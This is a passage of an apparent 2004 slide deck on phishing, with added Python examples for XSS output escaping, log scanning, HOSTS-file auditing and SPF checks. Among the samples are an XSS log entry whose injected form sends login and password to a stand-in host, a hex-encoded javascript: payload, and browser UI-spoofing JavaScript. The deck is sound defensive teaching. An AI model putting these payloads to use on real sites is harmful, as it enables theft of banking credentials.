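    'Password: <input type="password" name="password"><br>\n'
    '<input type="submit" value="Login">\n'
    "</form></body></html>\n"
)


def query_params(url):
    """Split the query string by hand (not parse_qs: older Pythons also split on ';',
    which would cut the payload in two) and percent-decode each value."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def render_login_page_vulnerable(err):
    """The bug: the error text goes into the HTML verbatim, so markup in it is live."""
    return PAGE_TEMPLATE.format(err=err)


def render_login_page_hardened(err):
    """The fix from the slide: encode < > & " ' as entities before output. The text
    is still displayed, but the browser no longer parses it as markup."""
    return PAGE_TEMPLATE.format(err=html.escape(err, quote=True))


def count_forms(page):
    """A second <form ...> in the page means the injected attacker form is live."""
    return page.count("<form ")


if __name__ == "__main__":
    err = query_params(DEMO_URL)["err"]
    print("decoded err parameter:", err)
    print("forms in vulnerable page:", count_forms(render_login_page_vulnerable(err)))
    print("forms in hardened page:", count_forms(render_login_page_hardened(err)))
```

The hardened page still shows the attacker's text to the user, which is why filtering the characters listed above on input is worth doing as well; but it is the output encoding that removes the second form and with it the onsubmit handler.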
XSS - Prevention
     • For administrators/developers:
       – For cookies: set the HttpOnly flag. Scripts running in
         the browser cannot read a cookie that carries the flag
         (document.cookie omits it), so an XSS foothold does not
         yield the session ID; the cookie is still sent with every
         request, so this limits theft, not session riding
       – Keep up with web server patches
       – Periodically test for XSS vulnerabilities using
         web application scanners
          • e.g. OWASP WebScarab
            http://www.owasp.org/software/webscarab.html




XSS - Detection
     • XSS exploits can be detected by reviewing the
       web server access log, e.g.:
     192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimage%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%2b%20document.forms(2).login.value%20%2b%20':'%20%2b%20document.forms(2).password.value;%22%3E HTTP/1.1" 200 4058




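The log review described above, as an added example that is not from the original presentation: a small Python scanner over constructed Apache-style access-log lines. The first line is the entry shown above; the remaining lines are constructed, one of them carrying the hex-encoded javascript: payload of the Google example so that it only shows up after decoding. The indicator list and the helper names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample log (Apache common format). Line 1 is the entry from the slide;
# line 3 is modelled on the Google cof= example, hex-encoded so that a plain grep for
# "script" misses it; lines 2 and 4 are ordinary traffic; line 5 is the IDS example.
SAMPLE_LOG = """\
192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimage%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%2b%20document.forms(2).login.value%20%2b%20':'%20%2b%20document.forms(2).password.value;%22%3E HTTP/1.1" 200 4058
192.168.1.77 - - [14/Oct/2004:10:41:15 +0800] "GET /banklogin.jsp?err=Invalid%20password HTTP/1.1" 200 3981
192.168.1.152 - - [21/Oct/2004:23:10:05 +0800] "GET /custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29 HTTP/1.1" 200 1200
192.168.1.77 - - [14/Oct/2004:10:41:20 +0800] "POST /login1.jsp HTTP/1.1" 302 0
192.168.1.152 - - [21/Oct/2004:23:04:54 +0800] "GET /banklogin.jsp?err=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1" 200 3990
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Indicators checked against the *decoded* request target; the names go into the report.
XSS_INDICATORS = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("html-tag", re.compile(r"<\s*/?\s*(form|iframe|img|object|embed)\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("dom-access", re.compile(r"document\.(cookie|forms|location)|new\s+Image\b", re.I)),
]


def decode_target(target, max_rounds=3):
    """Percent-decode repeatedly until stable: attackers double-encode to slip past
    single-pass filters, and a hex-encoded 'javascript:' is otherwise invisible."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_log(text):
    """Return one record per request whose decoded target trips an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; a real tool would count these
        decoded = decode_target(m.group("target"))
        hits = [name for name, rx in XSS_INDICATORS if rx.search(decoded)]
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "target": decoded, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], ",".join(f["hits"]), f["target"][:60])
```

Match the decoded target, never the raw one, and treat hits as leads rather than verdicts: the event-handler indicator will also fire on an innocent parameter whose name happens to start with "on".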
XSS - Detection
     • XSS exploits can also be detected by network-
       based Intrusion Detection System (IDS), e.g.
       [**] WEB-MISC cross site scripting attempt [**]
       10/21-23:04:54.960511 192.168.1.152:3341 -> 192.168.1.100:80
       TCP TTL:128 TOS:0x0 ID:28082 IpLen:20 DgmLen:307 DF
       ***AP*** Seq: 0xAB1F9A5C Ack: 0xEFB2E94B Win: 0x4470 TcpLen: 20

       Payload (decoded from the Snort hex dump):
       GET /banklogin.jsp?err=<script>alert('XSS')</script> HTTP/1.1
       Accept: */*
       Accept-Language: zh-hk
       User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
       Host: www.pisabank.com
       Connection: Keep-Alive
       Cookie: JSESSIONID=2BCC9DE6CDCFEDD7E25BCF3D689580F2

       Note the session cookie in the captured request: this is the
       value an injected script could read if the cookie were not
       marked HttpOnly.

2.5 Visual Spoofing
     • Targets the web browser interface
     • Displays a fake menu bar, status bar or dialogue
       box inside the web browser window
       – The address bar displays a fake URL
       – The status bar displays the golden "lock"
         icon indicating a secure SSL session, which has
         often been cited as the differentiator between
         legitimate sites and scams
       – The download or installation dialogue box shows
         fake information


How does it work?
     Graphic substitution approach
     1. The bogus web page is opened without the
        menu bar and status bar
           window.open("bogus.htm", "_blank", "height=700, width=683,
               location=no, menubar=no, toolbar=no, status=no, resizable=no,
               scrollbars=no");


     2. Images of a menu bar and status bar (with the golden
        "lock" icon) are displayed at the top and
        bottom of the bogus web page to pass as part of
        the browser user interface


Graphic Substitution Approach
     [Figure: the spoofed window, top to bottom: a header image
     imitating the browser menu bar, the bogus web content, and a
     footer image imitating the status bar with the lock icon.]

Graphic Substitution Approach
     3. Combined with the Internet Explorer JavaScript methods
        window.createPopup() and popup.show(), the attacker can
        cover the entire user desktop and construct a fake
        interface that captures and manipulates what the user sees.
            op = window.createPopup();
            op.document.body.innerHTML = "...html...";
            op.show(0, 0, screen.width, screen.height, document.body);




Browser UI Rebuild Approach
     1. The bogus web page is opened without the menu
        bar and status bar
     2. Some browser user interface functions (including
        the certificate viewer) are rebuilt on the
        bogus web page with downloaded XUL (XML-based
        User interface Language, the standards-based language
        developed by mozilla.org to create cross-platform
        user interfaces for Mozilla-based products such as the
        browser), so the fake chrome looks native to the
        Mozilla/Firefox browser
     Reference:
     http://www.nd.edu/~jsmith30/xul/test/spoof.html

Overriding Page Content Approach
     • The IE browser allows the creation of chromeless
       windows: screen objects that have none of the normal
       borders and other controls attached. Through JavaScript
       they can be positioned to hide or replace (by "sitting on
       top" of) the underlying content.
     • Attackers use these chromeless windows to spoof the
       graphical components of the browser, such as the URL
       address bar and the dialogue boxes for file download,
       software installation and bookmarks.

2.5 Visual Spoofing
     • Defense
       – Keep your web browser updated
       – Disable the JavaScript features that let a page hide
         your web browser's menu and status bar (Mozilla/Firefox
         exposes preferences for this)
       – Check the page info and properties (including the
         certificate) of the web page you are viewing before
         proceeding
       – Personalize (mark) your browser UI so that a painted-on
         fake is easier to spot




Demonstration 4
                  Visual Spoofing
              – Graphical substitution
              – Firefox browser UI rebuild approach
              – Chromeless window




2.6 Other Attack
          Trojan, Keylogger, Screen Grabber
     The attacker can lure the victim into installing a Trojan horse program
     through a bogus software patch or update web page. Once the
     victim has installed the Trojan horse program, the attacker can
     closely monitor the victim's PC activity by capturing keystrokes
     and the screen display.

     – Keylogger
         • Captures the victim's keystrokes in all windows
     – Screen grabber
         • Screen dumps or even video streams the victim's screen display




Demonstration 5
     Keylogger and Screen Grabber using Back Orifice




2.6 Other Attack
                     Man in the Middle Attack
         By poisoning the victim's DNS server, the attacker can redirect traffic
         meant for a legitimate site to the attacker's server, where the attacker
         can sniff password information even in an HTTPS connection.

         [Figure: Victim PC -> attacker server -> legitimate web server. The
         victim thinks he is talking to the legitimate site; actually the victim
         is talking to the attacker's server, which sniffs the password
         information and proxies the HTTPS traffic between the victim and the
         legitimate web server.]

         Note that the attacker must terminate the victim's HTTPS session with
         a certificate of his own, so the victim's browser will warn about the
         certificate unless the victim clicks through the warning or the
         attacker has obtained a certificate a CA was willing to issue (the
         "weak validation" in the Picture of Trust below).

New Quiet Attack (4-Nov-2004)
     • Modification of the HOSTS file
       – Captures online banking details WITHOUT requiring the user
         to click on a web site link
       – Works even if the USER TYPES THE URL IN MANUALLY
       – Working principle
          • A trojan is executed and modifies the HOSTS file
            (%SystemRoot%\System32\drivers\etc\hosts on Windows)
          • Entries in the HOSTS file override DNS resolution
          • The user is brought to the malicious site the next time he
            goes to that online transaction site, while the address bar
            shows the genuine name
     • Defense
       – Ensure Windows Scripting Host is disabled
       – Have antivirus and antispyware software installed
       – Check the HOSTS file for entries naming your bank

     • Reference: http://www.vnunet.com/news/1159171

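A check for the HOSTS-file override described above, as an added example rather than anything from the vnunet article or the deck. The sample file content and the watch list are constructed; the file locations are the real ones. A desktop support team could run the same function against the live file.

```python
import ipaddress
import re

# Where the file lives: Windows keeps it at %SystemRoot%\System32\drivers\etc\hosts,
# Unix-like systems at /etc/hosts.
HOSTS_PATHS = [r"C:\Windows\System32\drivers\etc\hosts", "/etc/hosts"]

# Constructed sample: a hosts file after the trojan described above has added two lines
# sending the bank's names to an attacker-controlled address (192.0.2.0/24 is the
# documentation range, used here as the stand-in for the attacker's server).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
192.0.2.44      www.pisabank.com
192.0.2.44      pisabank.com
0.0.0.0         ads.example.net
"""

# Domains whose resolution we care about (assumed watch list for the example).
WATCHED_DOMAINS = {"pisabank.com"}

HOSTS_ENTRY = re.compile(r"^\s*(?P<ip>[0-9a-fA-F:.]+)\s+(?P<names>[^#]+)")


def parse_hosts(text):
    """Yield (ip, hostname) pairs; comments and blank lines are skipped."""
    for line in text.splitlines():
        m = HOSTS_ENTRY.match(line)
        if not m:
            continue
        for name in m.group("names").split():
            yield m.group("ip"), name.lower()


def _is_watched(name):
    return any(name == d or name.endswith("." + d) for d in WATCHED_DOMAINS)


def audit_hosts(text):
    """Return findings as (severity, ip, hostname, reason).

    high:   a watched domain is mapped anywhere -> the typed URL goes to that IP
    medium: any other name mapped to a routable address -> review it
    Loopback and unspecified targets (localhost, 0.0.0.0 ad blocking) are ignored.
    """
    findings = []
    for ip, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append(("medium", ip, name, "unparseable address"))
            continue
        if _is_watched(name):
            findings.append(("high", ip, name, "watched domain overridden"))
        elif not (addr.is_loopback or addr.is_unspecified):
            findings.append(("medium", ip, name, "non-loopback mapping"))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(*finding)
```

Run audit_hosts over the contents of each path in HOSTS_PATHS; anything the trojan adds for a bank name comes back as a high finding even though the address bar looks right.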
Defense Strategies
     At the end user side
     • NEVER follow a link in an e-mail, posted article,
       chat room, ICQ message or banner advertisement
     • Enable your personal firewall and allow only the
       necessary traffic through
     • Keep your software (mail reader, web browser,
       virus definitions) patched and updated
     • Use PKI properly: check the site certificate rather than
       the lock icon alone before entering credentials

Defense Strategies
     At the server side
     • Make sure the web programs are fully tested, including input
       parsing and invalid input handling
     • Monitor for newly created cousin domains
     • Monitor major search engines and your honeypot accounts for
       phishing e-mails or posted messages targeting your organization
     • Monitor your web server log and identify suspicious web
       pages from the referer information
     • Provide a secure web proxy service for customers: this
       proxy can connect only to your legitimate web sites and
       nothing else
     • Provide secondary authentication for transactions, e.g. send a
       one-time password to the client by mobile SMS

Defense Strategies
     At the system and network admin side
     • Deploy anti-spam and anti-virus measures
           e.g. black/white lists, keyword lists, semantic analysis, various rules
           and characteristics, Bayesian filtering, challenge-response filtering,
           SMTP session verification, TurnTide anti-spam router, etc.
     • Deploy firewalls, intrusion detection systems and intrusion
       prevention systems to block attacks and Trojan backdoor
       connections
     • Put all non-server machines in private IP networks
     • Educate the users and make sure they stay on the updated
       software patch level
     At the software vendor side
     • Do not assume users have the security knowledge or
       awareness to use the product safely and wisely
     • Do not lower the security level in the product's default settings
     • Don't just make money: spend more time fixing bugs and
       fully testing the product

The Picture of Trust
     Trust chain from client to server, layer by layer, with the attack that
     breaks each layer:

     Layer               Trust mechanism                           Attacks on it
     ------------------  ----------------------------------------  --------------------------------
     Perception          Look and feel, message and tone,          Social engineering, cousin URL,
                         branding, physical settings               face lift
     CA                  Operational security, chain of trust,     Weak operation, weak validation
                         certificate & revocation
     Application         Email sender validation, apps,            Application vulnerabilities,
                         *browser*                                 XSS, visual spoofing
     Transport (host)    SSL                                       MITM
     Network (Internet)  DNS, hosts file, network routing          MITM, DNS poisoning
     Link (LAN)          ARP resolution                            MITM, sniffing

     Client  <----------------  IT infrastructure  ---------------->  Server

Defense Strategies
     •   Policy and User Education
     •   Prevention
     •   Detection
     •   Incident Response and Collaboration




3.1 Policy and User Education
     • Policy
       – HKMA guideline
          • Circular on monitoring online banking; regulation of bogus web
            sites
       – Regulating the use of domain names
          • HKMA and HKIRC cooperate in regulating the use of the words
            "bank" and "banque" in ".hk" domains
          • Is a further regulation mandating all authorized banking institutions
            to use ".bank.hk" a useful strategy?
             – Note: it still cannot stop techniques like visual spoofing

     • Humans are the weakest link
       – They trust too easily

3.1 User Education
     • Consumer Education
       – Pamphlet "Internet Banking – Keeping Your Money
         Safe"
          • by HKAB (Hong Kong Association of Banks)
            http://www.hkab.org.hk/PDF/customer_info/ebanking_e.pdf
       – TV and Radio programs
           • by HKMA and HKPF
       – Public seminars
           • by HKCERT
       – Alerts on some bank web sites




3.2 Prevention Technical
      • HKMA announced in June 2004 that within
        12 months, all authorized institutions should
        deploy two-factor authentication for high
        risk transactions
         – One-time password (e.g. SecurID-type hardware token,
           SMS one-time password)
         – Digital certificate on the Smart ID Card




3.2 Other Prevention & Detection
      • See previous sections on specific attacks




3.4 Incident Response and Collaboration
      • Report and Alert
         – SFC (Securities and Futures Commission) rewards the reporting
           of fraudulent copycat web sites and phishing scams
           targeting Hong Kong investors
            • Smart Investor Award
              http://www.hksfc.org.hk/eng/investor/html/smart_investor_award.htm

         – HKMA and SFC publish lists of unregistered financial and stock
           transaction web sites
            • http://www.hkma.gov.hk
            • http://www.hksfc.org.hk/chi/investor/html/unlicensed_overseas_comp.htm

         – Quick reaction and publishing of news in the media and press
           to alert the public

3.4 Incident Response and
                   Collaboration
      • Local Collaboration

        – Police, HKCERT and ISPs cooperating to close down
          bogus web sites in Hong Kong

        – Police, HKMA and HKAB have a standing collaboration
          body, meeting regularly on banking fraud prevention
          and response




3.4 Incident Response and Collaboration
      • Cross Border Collaboration
         – Police play an important role in cross-border crimes like phishing
         – CERT teams around the world are developing close collaboration in
           information exchange and in pinning down bogus web sites

      [Figure: world map of CSIRTs, global and Asia Pacific;
       source http://www.cert.org/csirts/images/map-full.gif]

3.5 Long Term Development
                      (Technology Infrastructure)
                               PHISHING & SPAM
                           One of the core issues:
            How to validate the identity of the sender and the sender domain,
               and whether the sending mail server is authorized?
      •   In the current Internet mail infrastructure, there is no
          validation of the sender: SMTP accepts any From address

      Plausible but not widely implemented methods of validation
      • Sender validation
           – Use digital signatures (S/MIME or PGP)

      •   Authenticated SMTP, to minimize abuse of open mail relays
           – RFC 2554 - SMTP Service Extension for Authentication
           – RFC 2487 - SMTP Service Extension for Secure SMTP over TLS


3.5 Long Term Development
                (Technology Infrastructure)
      • Domain Validation (works at the DNS level)
        – Standards based
           • Reverse DNS lookup

        – Proprietary solutions
           • SPF (Meng Weng Wong, pobox.com; AOL was an early adopter) }
           • Microsoft: Caller ID                                        } merged into Sender ID
           • Yahoo: DomainKeys




Sender Policy Framework SPF

     [Figure: sender mail server, recipient mail gateway, DNS server of
     SENDER.COM, recipient mailbox.]

     1. The sender sends out an email from SENDER.COM over SMTP.
     2. The recipient mail gateway issues a DNS query to SENDER.COM,
        asking for the list of authorized IP addresses of mail servers
        for SENDER.COM.
     3. The DNS server returns the list of authorized IP addresses of
        mail servers for SENDER.COM.
     4. The gateway checks whether the sending mail server is in the
        authorized IP address list. If so, the mail server is
        authorized and the mail is forwarded to the recipient's
        mailbox.

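Steps 2 to 4 of the SPF check above, as an added example that is not part of the original deck. DNS is replaced by a constructed table of TXT records so that it runs offline; only the ip4, ip6, include and all mechanisms are implemented, and the helper names are assumptions.

```python
import ipaddress

# Constructed stand-in for DNS: the TXT records a recipient gateway would fetch in step 2.
# 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
FAKE_DNS_TXT = {
    "sender.com": ["v=spf1 ip4:192.0.2.10 ip4:192.0.2.16/28 -all"],
    "partner.org": ["v=spf1 include:sender.com ~all"],
    "sloppy.example": ["v=spf1 +all"],  # authorizes the whole Internet: worthless
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_txt(domain):
    """Assumed resolver interface: return the TXT strings for a name (here from FAKE_DNS_TXT)."""
    return FAKE_DNS_TXT.get(domain.lower(), [])


def spf_record(domain, txt_lookup):
    """Exactly one v=spf1 record is valid; none means no policy, several is an error."""
    records = [r for r in txt_lookup(domain)
               if r.lower() == "v=spf1" or r.lower().startswith("v=spf1 ")]
    return records[0] if len(records) == 1 else None


def check_spf(sender_ip, mail_from_domain, txt_lookup=lookup_txt, depth=0):
    """Steps 2-4 of the diagram: fetch the domain's SPF record and test the connecting
    mail server's IP against it left to right; the first matching mechanism decides.
    Results use SPF terminology: pass, fail, softfail, neutral, none, permerror."""
    if depth > 10:
        return "permerror"  # include: loops are an error, not an endless recursion
    record = spf_record(mail_from_domain, txt_lookup)
    if record is None:
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech == "all":
            matched = True
        elif mech in ("ip4", "ip6"):
            try:
                # an IPv4 address is never inside an IPv6 network, and vice versa
                matched = ip in ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
        elif mech == "include":
            matched = check_spf(sender_ip, arg, txt_lookup, depth + 1) == "pass"
        else:
            return "permerror"  # a, mx, ptr, exists need more DNS than this example models
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"  # nothing matched and no explicit "all": SPF says neutral


if __name__ == "__main__":
    for ip, dom in [("192.0.2.10", "sender.com"), ("192.0.2.20", "sender.com"),
                    ("198.51.100.7", "sender.com"), ("198.51.100.7", "partner.org")]:
        print(dom, "from", ip, "->", check_spf(ip, dom))
```

A real deployment swaps lookup_txt for a resolver query and must also handle the a, mx, ptr and exists mechanisms and the redirect= modifier. Note what SPF does and does not prove: a pass says the connecting server is authorized by the MAIL FROM domain; a phisher who registers a cousin domain and publishes his own SPF record still passes.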
Proprietary Domain Validation
      • Caller ID
        – "XML version of SPF" with more options
      • DomainKeys
        – Uses public-key signatures, with the domain's public key published
          in DNS: validates the sender domain AND message integrity

      • Recent development
        – DomainKeys was submitted to the IETF as an Internet-Draft
        – SPF merged with Caller ID into Sender ID
        – Sender ID was submitted to the IETF in July 2004 and rejected in
          Oct 2004 over compatibility and intellectual-property (patent
          licensing) issues. Microsoft has re-submitted it with amendments;
          the industry is still discussing the new amendment.

3.5 Long Term Development
                       (Legislation)
                  PHISHING & SPAM

      – Legislate on cross-border jurisdiction, and
        establish mutually accepted process to handle
        phishing and spamming

      – Legislate on anti-spam, to reduce Open Mail Relay
        and Directory Harvesting Attacks



Conclusion

      • Phishing adversely impacts the growth of e-commerce
      • Phishermen now use both old social engineering tricks
        and more advanced technologies
      • Adopt multi-dimensional anti-phishing strategies
         – User education, prevention, detection, incident response and
           notification
         – Collaboration between law enforcement and the business sector,
           and across borders, is a vital element of success

      • Hitting spam also hits phishing. There is a need for legislative
        and technological reform.


Stop Watering Holes, Spear-Phishing and Drive-by Downloads
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
 
Year of pawnage - Ian trump
Year of pawnage  - Ian trumpYear of pawnage  - Ian trump
Year of pawnage - Ian trump
 
Phishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification AlgorithmsPhishing Website Detection using Classification Algorithms
Phishing Website Detection using Classification Algorithms
 
Webinar - Cyber Hygiene: Stay Clean at Work and at Home
Webinar - Cyber Hygiene: Stay Clean at Work and at HomeWebinar - Cyber Hygiene: Stay Clean at Work and at Home
Webinar - Cyber Hygiene: Stay Clean at Work and at Home
 
2011-10 The Path to Compliance
2011-10 The Path to Compliance 2011-10 The Path to Compliance
2011-10 The Path to Compliance
 
What Makes Web Applications Desirable For Hackers
What Makes Web Applications Desirable For HackersWhat Makes Web Applications Desirable For Hackers
What Makes Web Applications Desirable For Hackers
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Novinky F5
Novinky F5Novinky F5
Novinky F5
 
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_230 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
 
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phis...
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
 
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.ppt
 

Phishing exposed

  • 1. Supported by Computer Studies Division, City University of Hong Kong
  • 2. Presented by Mr. Alan Lam Mr. Bernard Kan Mr. S.C. Leung 2 (PHISHING )
  • 3. Disclaimer • This material is NOT intended to be adopted in the course of attacking any computing system, nor does it encourage such act. • PISA takes no liability to any act of the user or damage caused in making use of this report. • The points made here are deliberately kept concise for the purpose of presentation. If you require technical details please refer to other technical references. 3 (PHISHING )
  • 4. Copyright • The copyright of this material belongs to the Professional Information Security Association (PISA). • A third party could use this material for non-commercial purpose, given that no change in the meaning or interpretation of the content was made and reference is made to PISA. All rights are reserved by PISA. 4 (PHISHING )
  • 5. Agenda 1. Overview of Phishing ? 1.1 What is Phishing? 1.2 Examples of Phishing .. email, web site 1.3 Current Profile of Phishing Attack 2. Attack Strategies & Technologies and Defenses 2.1 Cousin URL Attack 2.2 URL Obfuscation Attack 2.3 Face Lift Attack 2.4 Cross-site Scripting Attack 2.5 Visual Spoofing Attacks 2.6 Other Attacks 3. Defense Strategies Against Phishing Attack 3.1 Policy and User Education 3.2 Prevention 3.3 Detection 3.4 Incident Response and Collaboration 5 3.5 Long Term Dev’t in technology infrastructure and legislation (PHISHING )
  • 6. 1.1 What is Phishing? Phishing attacks use 'spoofed' e-mails and fraudulent websites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, social security numbers, etc. Quoted from http://www.antiphishing.org 6 (PHISHING )
  • 7. Origin of Term • Phreaking + Fishing = Phishing • Phreaking: exploiting vulnerability of phone system to make calls without paying in the 70’s • Fishing : Use of bait to get target on hook • 7 (PHISHING )
  • 8. Why Phishing becomes a threat to us? • Online transaction, such as e-banking, becomes more and more popular – Verisign July 2004 report: eCommerce yearly increase by 13.2% • In order to make their online transaction service easy to use and please their customers, some service providers sacrifice good security features, such as user certificates. • Fancy web features (DHTML, Java, ActiveX, Flash, XML) introduce new web vulnerabilities which most service providers and browser vendors have not caught up with. And these web features are supported by most email/newsreaders, search engines, chat rooms, or ICQ. • Spamming technology and facilities are becoming mature. Legislation in this area cannot catch up. • Internet being a Virtual World, it lacks a physical identity for user to validate. Trust building is an intrinsic problem. • The current Internet infrastructure is insecure by default. • It is much cheaper and safer for attackers to carry out fraud on the Internet. • All the above points encourage attackers to gain financial profit by Phishing attack. 8 (PHISHING )
  • 9. How does Phishing work? • Social engineering used in the crafted Spam email and Fake web site – Use spoofed identity (of trusted organization) to gain trust – Use the wording and tone that the trusted organization usually uses – Emphasize an urgency to “update” or “validate” data to rectify problem – Threaten to terminate account or process the mistaken transaction – Inform user to get free coupon or win lottery because of product promotion • Luring victim to a bogus website (the net in fishing) – Convincing URL – Disguised web interface • Make the bogus web site look like the original web site. • Detail level down to fonts, company logo, or even the browser UI – When users log in to the bogus website, username and password are captured. 9 (PHISHING )
  • 10. Workflow of Phishing Attack 1. Preparation a. Research and Development • Identify the target organization • Identify the vulnerability of the target organization web page • Identify the vulnerability of email reader and web browser that can facilitate the attack b. Prepare scam email and Capture website according to the above collected information c. Gather or purchase email addresses d. Ride on SMTP Open Relay or purchase similar services 2. Attacking a. Send out scam mail (the bait) via open relay server / services b. Post the scam mail to newsgroups, chat rooms, ICQ messages or Banner advertising c. Submit the bogus website to search engines d. Wait for victim at the Capture Website (the trapping net) 3. Harvesting a. Capture data collected at Capture Website b. Use or Sell the data or captured hosts… 10 (PHISHING )
  • 11. Phishing Categories Attackers’ Objectives – Fraud in money transfer – Fraud in personal information theft – Installing Key Logger and Trojan for other purposes such as proxy for other attacks Loss and Damage – Financial – Leakage of sensitive information – Control of computer fallen to attacker – Damage to branding and corporate image – Damage to consumer confidence in online transaction and eventually impact Image Source: www.jcsbank.com/ phishing.html development of e-Commerce 11 (PHISHING )
  • 12. Demonstration 1 Examples of Phishing PayPal Ebay Hang Seng Bank HSBC Citibank US Bank SunTrust Bank Citizens Bank 12 (PHISHING )
  • 13. 1.3 Current Profile of Phishing Attack References • Verisign Internet Intelligence Briefing (2004-07) – http://www.verisign.com/stellent/groups/public/documents/white_paper/006583.pdf • Anti-Phishing Working Group (APWG) Trend Report (2004-06) – http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf • Gartner Report (2004-06) – Internet Banking Fraud had brought about loss of US$2.4B – http://www.itu.int/osg/spu/newslog/categories/indicatorsAndStatistics/2004/06/21.html#a692 • Hong Kong Police Statistics (2004-07) 13 (PHISHING )
  • 14. Anti-Phishing Working Group Trend Report (2004-06) [Bar chart: Monthly Unique phishing attacks, Jan-04 to Jun-04; y-axis: count of unique attacks (0 to 1500); data labels shown on the chart: 176, 282, 402, 1125, 1422, 1197] 14 (PHISHING )
  • 15. Phishing Attack Target (APWG 2004-06) 1. Citibank 2. eBay 3. US Bank 4. Pay Pal 12 VISA 17. HSBC 15 (PHISHING )
  • 16. Phishing Web site location
      Verisign (2004-07):  USA 63% | South Korea 10% | Mainland China 5% | Brazil 2% | Poland 2%
      APWG (2004-06):      USA 27% | South Korea 20% | Mainland China 16% | Taiwan 7% | Holland 3%
      • Phishermen usually choose location (APWG 2004-06) – Where there is language or time zone difference with brand owner, to create the barrier to close down the bogus web site – On compromised machines (25% by analysis) 16 (PHISHING )
  • 17. Phishing Sender Source [Two pie charts, Verisign (2004-07) and APWG (2004-06), each split into Spoofed Address, Cousin Address and Web Email Address; spoofed addresses dominate both (92% and 93%), the remaining slices being cousin and web email addresses of 1% to 7% each] 17 (PHISHING )
  • 18. Phishing impact can be great • Impact to USA (Gartner Report 2004-06) – 57 million US consumers attacked – 3-5% recipients became victims – About 1.98 million reported their account intruded – Loss involved was US$2.4 billion (average loss per victim US$1,200) 18 (PHISHING )
